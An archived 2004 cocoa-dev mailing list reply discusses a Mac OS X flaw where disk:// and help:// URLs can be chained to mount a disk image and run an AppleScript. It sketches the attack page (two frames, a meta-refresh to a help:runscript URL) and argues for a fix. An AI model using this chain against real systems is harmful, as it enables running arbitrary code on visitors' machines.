Re: disk:// and help:// security problems
Re: disk:// and help:// security problems
- Subject: Re: disk:// and help:// security problems
- From: Allan Odgaard <email@hidden>
- Date: Tue, 18 May 2004 06:18:54 +0200
On 18. May 2004, at 5:58, Jonathan Wight wrote:
Actually that's slightly incorrect I believe. You need two URL's one
to download a malicious AppleScript and then the help:// URL to cause
it to execute.
This is why the disk:-URL was also mentioned in the exploit.
Also the user must have auto-open 'safe' downloads turned on _and_
have his/her download location known to the attacker (probably
~/Desktop).
Let index.html have two frames, the first with a disk:-URL to a
disk-image and let the second use meta-refresh with a small delay and
the new target
help:runscript=/Volumes/DiskImageWeJustMounted/Dangerous.scpt -- it's
that simple!
I didn't test it, other than verify that entering a help:-URL with a
runscript does execute the script, and likewise does a disk:-URL mount
the disk image. There might be some security measures in Safari, like
only adhering to Launch Services when the URL was clicked or entered
manually, which would make it a less likely exploit, but I doubt it, as
that would probably break a lot of stuff, like redirects to ftp-sites
etc. -- the fix should be to *not* allow help:-URLs (from the outside
world) to execute arbitrary scripts.
_______________________________________________
cocoa-dev mailing list | email@hidden
Help/Unsubscribe/Archives:
http://www.lists.apple.com/mailman/listinfo/cocoa-dev
Do not post admin requests to the list. They will be ignored.